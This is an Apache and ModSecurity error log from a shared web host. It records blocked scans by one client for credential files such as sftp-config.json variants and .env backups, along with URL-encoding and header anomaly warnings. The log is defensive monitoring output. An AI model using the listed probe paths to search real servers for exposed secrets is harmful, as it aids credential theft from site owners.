[Mon May 11 11:33:13.234559 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:2728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiWBjZymfuKpjWXeh2DQAAANU"]
[Mon May 11 11:33:13.261186 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:21294] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json5"] [unique_id "agGiWZkIEwRJMyDaV55IAQAAAUY"]
[Mon May 11 11:33:13.262246 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:21294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json5"] [unique_id "agGiWZkIEwRJMyDaV55IAQAAAUY"]
[Mon May 11 11:33:14.983306 2026] [security2:error] [pid 1254212:tid 1254214] [client 81.167.26.57:7961] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/plugins/\\"%s/\\""] [unique_id "agGiWkYQeUtAPynIs6xSOQAAAAA"]
[Mon May 11 11:33:14.990720 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:21294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiWZkIEwRJMyDaV55IAQAAAUY"]
[Mon May 11 11:33:15.023799 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:21300] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_new"] [unique_id "agGiWxjZymfuKpjWXeh2EAAAAMI"]
[Mon May 11 11:33:15.024354 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:21300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_new"] [unique_id "agGiWxjZymfuKpjWXeh2EAAAAMI"]
[Mon May 11 11:33:16.360791 2026] [proxy_fcgi:error] [pid 1254212:tid 1254214] [client 81.167.26.57:7961] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:33:17.538258 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:21300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiWxjZymfuKpjWXeh2EAAAAMI"]
[Mon May 11 11:33:17.560738 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:21316] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_new"] [unique_id "agGiXb4KNmD_mZ_vlf8yrAAAAEw"]
[Mon May 11 11:33:17.561064 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:21316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_new"] [unique_id "agGiXb4KNmD_mZ_vlf8yrAAAAEw"]
[Mon May 11 11:33:19.580648 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:21316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiXb4KNmD_mZ_vlf8yrAAAAEw"]
[Mon May 11 11:33:19.607103 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:21324] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_staging"] [unique_id "agGiX74KNmD_mZ_vlf8yrwAAAFI"]
[Mon May 11 11:33:19.607654 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:21324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_staging"] [unique_id "agGiX74KNmD_mZ_vlf8yrwAAAFI"]
[Mon May 11 11:33:20.807624 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:21324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiX74KNmD_mZ_vlf8yrwAAAFI"]
[Mon May 11 11:33:20.834798 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:21336] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_staging"] [unique_id "agGiYGS6k_SCYd1AVZqoqwAAAQs"]
[Mon May 11 11:33:20.835133 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:21336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_staging"] [unique_id "agGiYGS6k_SCYd1AVZqoqwAAAQs"]
[Mon May 11 11:33:22.450787 2026] [security2:error] [pid 1254212:tid 1254214] [client 81.167.26.57:7961] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/themes/\\"%1$s/\\""] [unique_id "agGiYkYQeUtAPynIs6xSSwAAAAA"]
[Mon May 11 11:33:22.525224 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:21336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiYGS6k_SCYd1AVZqoqwAAAQs"]
[Mon May 11 11:33:22.551458 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:21340] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_temp"] [unique_id "agGiYhjZymfuKpjWXeh2HgAAANM"]
[Mon May 11 11:33:22.551937 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:21340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_temp"] [unique_id "agGiYhjZymfuKpjWXeh2HgAAANM"]
[Mon May 11 11:33:23.747659 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:21340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiYhjZymfuKpjWXeh2HgAAANM"]
[Mon May 11 11:33:23.771740 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:15712] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_temp"] [unique_id "agGiY5kIEwRJMyDaV55IEAAAAUc"]
[Mon May 11 11:33:23.771953 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:15712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_temp"] [unique_id "agGiY5kIEwRJMyDaV55IEAAAAUc"]
[Mon May 11 11:33:23.970856 2026] [security2:error] [pid 1254212:tid 1254214] [client 81.167.26.57:7961] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/themes/\\"%s/\\""] [unique_id "agGiY0YQeUtAPynIs6xSTQAAAAA"]
[Mon May 11 11:33:25.318855 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:15712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiY5kIEwRJMyDaV55IEAAAAUc"]
[Mon May 11 11:33:25.345042 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:15714] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_test"] [unique_id "agGiZb4KNmD_mZ_vlf8yswAAAFE"]
[Mon May 11 11:33:25.345532 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:15714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json_test"] [unique_id "agGiZb4KNmD_mZ_vlf8yswAAAFE"]
[Mon May 11 11:33:27.548267 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:15714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiZb4KNmD_mZ_vlf8yswAAAFE"]
[Mon May 11 11:33:27.572620 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:15718] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_test"] [unique_id "agGiZxjZymfuKpjWXeh2KQAAANg"]
[Mon May 11 11:33:27.572814 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:15718] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json_test"] [unique_id "agGiZxjZymfuKpjWXeh2KQAAANg"]
[Mon May 11 11:33:28.037286 2026] [security2:error] [pid 1256241:tid 1256256] [client 5.181.131.240:60125] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGiaJkIEwRJMyDaV55IGQAAAUo"], referer: https://www.piregwan-genesis.com/
[Mon May 11 11:33:29.570920 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:15718] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiZxjZymfuKpjWXeh2KQAAANg"]
[Mon May 11 11:33:37.413099 2026] [authz_core:error] [pid 1254328:tid 1254349] [client 88.88.156.124:45078] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/EmailEditor/error_log
[Mon May 11 11:33:38.926236 2026] [authz_core:error] [pid 1254328:tid 1254349] [client 88.88.156.124:45078] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/error_log
[Mon May 11 11:33:46.716987 2026] [authz_core:error] [pid 1256241:tid 1256259] [client 88.88.156.124:58334] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 11:33:48.234247 2026] [authz_core:error] [pid 1256241:tid 1256259] [client 88.88.156.124:58334] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 11:33:49.751786 2026] [authz_core:error] [pid 1256241:tid 1256259] [client 88.88.156.124:58334] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 11:33:50.410204 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:14296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.bak.src"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/shop/.env.bak.src"] [unique_id "agGifkYQeUtAPynIs6xScwAAAAU"]
[Mon May 11 11:33:50.414036 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:14296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/shop/.env.bak.src"] [unique_id "agGifkYQeUtAPynIs6xScwAAAAU"]
[Mon May 11 11:33:51.273936 2026] [authz_core:error] [pid 1256241:tid 1256259] [client 88.88.156.124:58334] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 11:33:51.578196 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:14296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGifkYQeUtAPynIs6xScwAAAAU"]
[Mon May 11 11:33:51.604193 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:14300] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.bak.src"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/shop/.env.bak.src"] [unique_id "agGif2S6k_SCYd1AVZqoyAAAAQg"]
